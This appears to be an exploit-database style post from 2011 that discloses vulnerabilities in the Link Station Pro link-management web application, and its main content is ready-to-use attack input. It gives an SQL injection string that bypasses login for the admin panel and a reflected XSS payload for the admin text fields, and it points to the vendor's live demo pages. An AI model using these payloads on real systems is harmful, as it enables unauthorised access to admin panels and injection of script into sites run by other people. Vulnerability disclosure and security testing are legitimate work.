%+
$.......#........4.........|)........0............\/\/ %+%+%+%++++++++++++++++++++++++++++++++++++++++# Exploit Title: Link Station Pro Multiple Vulnerabilities# Vendor:www.linkstationpro.com# Date: 28th july,2011# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D (
http://www.shadowrootkit.wordpress.com)# Google Dork:� 2011 Copyright SteveDawson.com*****************************************************************************************************************************************************************************************
BREIF DESCRIPTION
*****************************
Link Station Pro is without doubt, the most efficient, easiest and most
configurable reciprocal link management tool available forall your
reciprocal link requirements.******************************************************************************************************************************************************************************************(Auth ByPass) SQLi Vulnerability
***************************************{DEMO}: http://www.linkstationpro.com/Partners/admindemo/index.php
EXPLOIT:
Username:' or 'bug'='bug' #
Password:' or 'bug'='bug' #
Observe: Attackers can use Authentication Bypass to get into Admin Panel in
the site.
Reflected XSS Vulnerability
********************************
EXPLOIT 2:XSS Vulnerability in admin panel(in most of the text fields){Demo}:
http://www.linkstationpro.com/Partners/admindemo/manage_categories.php
Exploit:">><marquee><h1>XSSed_by_r007k17</h1></marquee>*****************************************************************************************************************************************************************************************
gr33t1ngs to s1d3 effects and my friends@!3.14--*****************************************************************************************************************************************************************************************